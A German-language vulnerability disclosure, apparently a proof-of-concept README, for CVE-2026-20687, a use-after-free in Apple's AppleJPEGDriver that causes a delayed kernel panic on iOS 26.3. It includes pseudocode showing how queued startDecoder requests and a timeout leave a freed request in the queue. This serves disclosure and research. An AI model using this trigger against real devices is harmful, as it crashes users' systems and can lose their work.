
CVE-2026-20687: AppleJPEGDriver startDecoder Timeout UAF — iOS/macOS-Kernel-Schwachstelle, die zu einem verzögerten Panic führt (A19 Pro, iOS 26.3 RC)
CVE-2026-20687 | Autor: Johnny Franks (@zeroxjf)
Komponente: Kernel
Auswirkung: Eine App kann möglicherweise einen unerwarteten Systemabsturz verursachen oder Kernel-Speicher beschreiben
Beschreibung: Ein Use-after-free-Problem wurde durch verbessertes Speichermanagement behoben.
Dies führt zu einem Kernel-Panic auf deinem Gerät. Speichere deine Arbeit.
Getestet auf iOS 26.3 (23D125) auf iPhone18,2 (iPhone 17 Pro Max, A19 Pro).
Direkter Auslöser:
// PoC: initialisiert den Treiber; Panic ist normalerweise verzögert, bis die Kamera geöffnet wird.
IOServiceOpen("AppleJPEGDriver");
for (int i = 0; i < N; i++) {
startDecoder_async(); // queue_io_gated(): vector.push(req + 0x78)
}
IOServiceClose(conn);
// Später löst das Öffnen der Kamera Folgendes aus:
startDecoder_sync();
queue_io_gated(): vector.push(req + 0x78);
wait(10s) -> TIMEOUT;
pool_free(req); // FEHLER: entfernt NICHT aus der Warteschlange (req + 0x78)
// Noch später (finish_io_gated):
fullSpeedRequestExist():
node_ptr = vector[i]; // veraltet: node_ptr == (freigegebenes req + 0x78)
req2 = *(node_ptr + 0x8); // UAF-Lesen von req+0x80 -> MTE-Tag-Fehler -> Panic
ios-app/Test.xcodeproj in Xcode